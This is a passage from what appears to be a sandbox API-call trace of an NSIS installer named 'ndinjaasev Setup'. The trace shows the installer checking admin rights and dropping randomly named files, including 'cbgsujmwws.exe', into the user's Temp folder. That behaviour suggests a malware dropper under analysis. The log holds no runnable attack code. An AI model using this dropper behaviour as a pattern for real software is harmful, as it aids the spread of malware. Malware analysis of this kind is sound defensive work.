returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0116.395] LoadImageW (hInst=0x400000, name=0x67, type=0x1, cx=0, cy=0, fuLoad=0x8040) returned 0x40119 [0116.401] wsprintfW (in: param_1=0x437000, param_2="%d" | out: param_1="1033") returned 4 [0116.401] lstrlenW (lpString="ndinjaasev") returned 10 [0116.401] lstrcpynW (in: lpString1=0x429220, lpString2="ndinjaasev Setup", iMaxLength=1024 | out: lpString1="ndinjaasev Setup") returned="ndinjaasev Setup" [0116.401] SetWindowTextW (hWnd=0x0, lpString="ndinjaasev Setup") returned 0 [0116.401] lstrcpynW (in: lpString1=0x6b2ebc, lpString2="ttwrgevakfwu", iMaxLength=1024 | out: lpString1="ttwrgevakfwu") returned="ttwrgevakfwu" [0116.401] lstrcpynW (in: lpString1=0x6b36d4, lpString2="wxzhkncjix", iMaxLength=1024 | out: lpString1="wxzhkncjix") returned="wxzhkncjix" [0116.401] ShowWindow (hWnd=0x0, nCmdShow=5) returned 0 [0116.401] GetSystemDirectoryW (in: lpBuffer=0x19f914, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0116.401] wsprintfW (in: param_1=0x19f93a, param_2="%s%S.dll" | out: param_1="\\RichEd20.dll") returned 13 [0116.401] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\RichEd20.dll", hFile=0x0, dwFlags=0x8) returned 0x6cd70000 [0117.221] GetClassInfoW (in: hInstance=0x0, lpClassName="RichEdit20W", lpWndClass=0x4291c0 | out: lpWndClass=0x4291c0) returned 1 [0117.222] DialogBoxParamW (hInstance=0x400000, lpTemplateName=0x69, hWndParent=0x0, lpDialogFunc=0x403f64, dwInitParam=0x0) returned 0x0 [0117.976] GetDlgItem (hDlg=0xd0042, nIDDlgItem=1) returned 0x602b0 [0117.976] GetDlgItem (hDlg=0xd0042, nIDDlgItem=2) returned 0x402c0 [0117.976] SetDlgItemTextW (hDlg=0xd0042, nIDDlgItem=1028, lpString="Nullsoft Install System v3.08") returned 1 [0117.976] SetClassLongW (hWnd=0xd0042, nIndex=-14, dwNewLong=262425) returned 0x0 [0117.980] lstrcpynW (in: lpString1=0x4281c0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0117.980] lstrlenW (lpString="") returned 0 [0117.980] lstrcpynW (in: lpString1=0x40b5c8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0117.980] lstrcpynW (in: lpString1=0x40bdc8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0117.980] lstrcmpiW (lpString1="", lpString2="") returned 0 [0117.980] lstrcpynW (in: lpString1=0x4281c0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0117.980] lstrlenW (lpString="") returned 0 [0117.980] lstrcpynW (in: lpString1=0x6ccf24, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0117.980] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0117.980] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0117.980] lstrcpynW (in: lpString1=0x40adc8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0117.980] GetTickCount () returned 0x1519f75 [0117.980] GetTempFileNameW (in: lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpPrefixString="nsl", uUnique=0x0, lpTempFileName=0x42b000 | out: lpTempFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsl9f76.tmp")) returned 0x9f76 [0117.982] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp" [0117.982] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp") returned 48 [0117.982] lstrcpynW (in: lpString1=0x40a5c8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp" [0117.982] lstrcpynW (in: lpString1=0x425f10, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp" [0117.982] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp") returned 48 [0117.982] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsl9f76.tmp"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x357c501a, ftCreationTime.dwHighDateTime=0x1d8604e, ftLastAccessTime.dwLowDateTime=0x357c501a, ftLastAccessTime.dwHighDateTime=0x1d8604e, ftLastWriteTime.dwLowDateTime=0x357c501a, ftLastWriteTime.dwHighDateTime=0x1d8604e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nsl9F76.tmp", cAlternateFileName="")) returned 0x69e5d8 [0117.983] FindClose (in: hFindFile=0x69e5d8 | out: hFindFile=0x69e5d8) returned 1 [0117.983] DeleteFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsl9f76.tmp")) returned 1 [0117.983] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp" [0117.983] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp") returned 48 [0117.983] lstrcpynW (in: lpString1=0x40adc8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp" [0117.983] CreateDirectoryW (lpPathName="C:\\Users" (normalized: "c:\\users"), lpSecurityAttributes=0x0) returned 0 [0117.984] GetLastError () returned 0xb7 [0117.984] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0117.984] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx"), lpSecurityAttributes=0x0) returned 0 [0117.984] GetLastError () returned 0xb7 [0117.984] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx")) returned 0x10 [0117.984] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata"), lpSecurityAttributes=0x0) returned 0 [0117.984] GetLastError () returned 0xb7 [0117.984] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata")) returned 0x12 [0117.984] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local"), lpSecurityAttributes=0x0) returned 0 [0117.984] GetLastError () returned 0xb7 [0117.985] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local")) returned 0x10 [0117.985] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0117.985] GetLastError () returned 0xb7 [0117.985] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 0x10 [0117.985] GetModuleHandleA (lpModuleName="SHELL32") returned 0x75db0000 [0117.985] GetProcAddress (hModule=0x75db0000, lpProcName=0x2a8) returned 0x7605db90 [0117.985] IsUserAnAdmin () returned 1 [0117.986] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsl9f76.tmp"), lpSecurityAttributes=0x19f0d8) returned 1 [0117.986] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp" [0117.986] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp") returned 48 [0117.986] lstrcpynW (in: lpString1=0x40a5c8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp" [0117.986] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp") returned 48 [0117.986] lstrcpynW (in: lpString1=0x438000, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp" [0117.986] lstrcpynW (in: lpString1=0x42b000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0117.987] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0117.987] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0117.987] lstrcpynW (in: lpString1=0x40adc8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0117.988] CreateDirectoryW (lpPathName="C:\\Users" (normalized: "c:\\users"), lpSecurityAttributes=0x0) returned 0 [0117.988] GetLastError () returned 0xb7 [0117.988] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0117.988] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx"), lpSecurityAttributes=0x0) returned 0 [0117.988] GetLastError () returned 0xb7 [0117.988] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx")) returned 0x10 [0117.988] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata"), lpSecurityAttributes=0x0) returned 0 [0117.989] GetLastError () returned 0xb7 [0117.989] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata")) returned 0x12 [0117.989] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local"), lpSecurityAttributes=0x0) returned 0 [0117.989] GetLastError () returned 0xb7 [0117.989] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local")) returned 0x10 [0117.989] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0117.989] GetLastError () returned 0xb7 [0117.989] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 0x10 [0117.990] lstrcpynW (in: lpString1=0x436000, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0117.990] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 1 [0117.990] lstrcpynW (in: lpString1=0x40bdc8, lpString2="jurqlvqzsu80j5x5", iMaxLength=1024 | out: lpString1="jurqlvqzsu80j5x5") returned="jurqlvqzsu80j5x5" [0117.990] lstrcpynW (in: lpString1=0x40a5c8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0117.991] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0117.991] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0117.991] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpString2="jurqlvqzsu80j5x5" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\jurqlvqzsu80j5x5") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\jurqlvqzsu80j5x5" [0117.991] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\jurqlvqzsu80j5x5" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\jurqlvqzsu80j5x5")) returned 0xffffffff [0117.991] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\jurqlvqzsu80j5x5" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\jurqlvqzsu80j5x5")) returned 0xffffffff [0117.991] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\jurqlvqzsu80j5x5" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\jurqlvqzsu80j5x5"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28 [0117.992] SetFilePointer (in: hFile=0x210, lDistanceToMove=38461, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x963d [0117.992] ReadFile (in: hFile=0x210, lpBuffer=0x19f3f0, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x19f3f0*, lpNumberOfBytesRead=0x19f330*=0x4, lpOverlapped=0x0) returned 1 [0117.992] GetTickCount () returned 0x1519f84 [0117.992] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0118.069] GetTickCount () returned 0x1519fd2 [0118.069] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x43b8, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x43b8, lpOverlapped=0x0) returned 1 [0118.071] GetTickCount () returned 0x1519fd2 [0118.071] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0118.073] GetTickCount () returned 0x1519fd2 [0118.073] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x424a, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x424a, lpOverlapped=0x0) returned 1 [0118.074] GetTickCount () returned 0x1519fd2 [0118.074] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0118.076] GetTickCount () returned 0x1519fd2 [0118.076] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x496f, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x496f, lpOverlapped=0x0) returned 1 [0118.077] GetTickCount () returned 0x1519fd2 [0118.077] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0118.081] GetTickCount () returned 0x1519fd2 [0118.081] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x4843, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x4843, lpOverlapped=0x0) returned 1 [0118.082] GetTickCount () returned 0x1519fd2 [0118.082] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x4000, lpOverlapped=0x0) returned 1 [0118.084] GetTickCount () returned 0x1519fd2 [0118.084] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x5f42, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x5f42, lpOverlapped=0x0) returned 1 [0118.085] GetTickCount () returned 0x1519fe2 [0118.085] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x5fd, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x5fd, lpOverlapped=0x0) returned 1 [0118.085] GetTickCount () returned 0x1519fe2 [0118.085] MulDiv (nNumber=83453, nNumerator=100, nDenominator=83453) returned 100 [0118.086] wsprintfW (in: param_1=0x19f34c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0118.086] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x2909, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x2909, lpOverlapped=0x0) returned 1 [0118.086] GetTickCount () returned 0x1519fe2 [0118.086] MulDiv (nNumber=83453, nNumerator=100, nDenominator=83453) returned 100 [0118.086] wsprintfW (in: param_1=0x19f34c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0118.086] SetFileTime (hFile=0x28, lpCreationTime=0x19f6b8, lpLastAccessTime=0x0, lpLastWriteTime=0x19f6b8) returned 1 [0118.086] CloseHandle (hObject=0x28) returned 1 [0118.091] lstrcpynW (in: lpString1=0x40bdc8, lpString2="jplmbcuny", iMaxLength=1024 | out: lpString1="jplmbcuny") returned="jplmbcuny" [0118.091] lstrcpynW (in: lpString1=0x40a5c8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0118.091] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0118.092] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0118.092] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpString2="jplmbcuny" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\jplmbcuny") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\jplmbcuny" [0118.092] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\jplmbcuny" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\jplmbcuny")) returned 0xffffffff [0118.092] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\jplmbcuny" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\jplmbcuny")) returned 0xffffffff [0118.092] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\jplmbcuny" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\jplmbcuny"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28 [0118.092] SetFilePointer (in: hFile=0x210, lDistanceToMove=121918, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1dc3e [0118.092] ReadFile (in: hFile=0x210, lpBuffer=0x19f3f0, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x19f3f0*, lpNumberOfBytesRead=0x19f330*=0x4, lpOverlapped=0x0) returned 1 [0118.092] GetTickCount () returned 0x1519fe2 [0118.092] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0xa27, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0xa27, lpOverlapped=0x0) returned 1 [0118.156] GetTickCount () returned 0x151a021 [0118.156] MulDiv (nNumber=2599, nNumerator=100, nDenominator=2599) returned 100 [0118.156] wsprintfW (in: param_1=0x19f34c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0118.156] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x130b, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x130b, lpOverlapped=0x0) returned 1 [0118.157] GetTickCount () returned 0x151a021 [0118.157] MulDiv (nNumber=2599, nNumerator=100, nDenominator=2599) returned 100 [0118.158] wsprintfW (in: param_1=0x19f34c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0118.158] SetFileTime (hFile=0x28, lpCreationTime=0x19f6b8, lpLastAccessTime=0x0, lpLastWriteTime=0x19f6b8) returned 1 [0118.158] CloseHandle (hObject=0x28) returned 1 [0118.159] lstrcpynW (in: lpString1=0x40bdc8, lpString2="cbgsujmwws.exe", iMaxLength=1024 | out: lpString1="cbgsujmwws.exe") returned="cbgsujmwws.exe" [0118.159] lstrcpynW (in: lpString1=0x40a5c8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0118.159] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0118.159] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0118.160] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpString2="cbgsujmwws.exe" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\cbgsujmwws.exe") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\cbgsujmwws.exe" [0118.160] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\cbgsujmwws.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\cbgsujmwws.exe")) returned 0xffffffff [0118.160] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\cbgsujmwws.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\cbgsujmwws.exe")) returned 0xffffffff [0118.161] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\cbgsujmwws.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\cbgsujmwws.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28 [0118.161] SetFilePointer (in: hFile=0x210, lDistanceToMove=124521, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e669 [0118.161] ReadFile (in: hFile=0x210, lpBuffer=0x19f3f0, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x19f3f0*, lpNumberOfBytesRead=0x19f330*=0x4, lpOverlapped=0x0) returned 1 [0118.161] GetTickCount () returned 0x151a030 [0118.162] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x885, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x885, lpOverlapped=0x0) returned 1 [0118.347] GetTickCount () returned 0x151a0dc [0118.347] MulDiv (nNumber=2181, nNumerator=100, nDenominator=2181) returned 100 [0118.347] wsprintfW (in: param_1=0x19f34c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0118.348] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x1600, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x1600, lpOverlapped=0x0) returned 1 [0118.353] GetTickCount () returned 0x151a0ec [0118.353] MulDiv (nNumber=2181, nNumerator=100, nDenominator=2181) returned 100 [0118.353] wsprintfW (in: param_1=0x19f34c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0118.354] SetFileTime (hFile=0x28, lpCreationTime=0x19f6b8, lpLastAccessTime=0x0, lpLastWriteTime=0x19f6b8) returned 1 [0118.354] CloseHandle (hObject=0x28) returned 1 [0118.355] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0118.355] lstrlenW 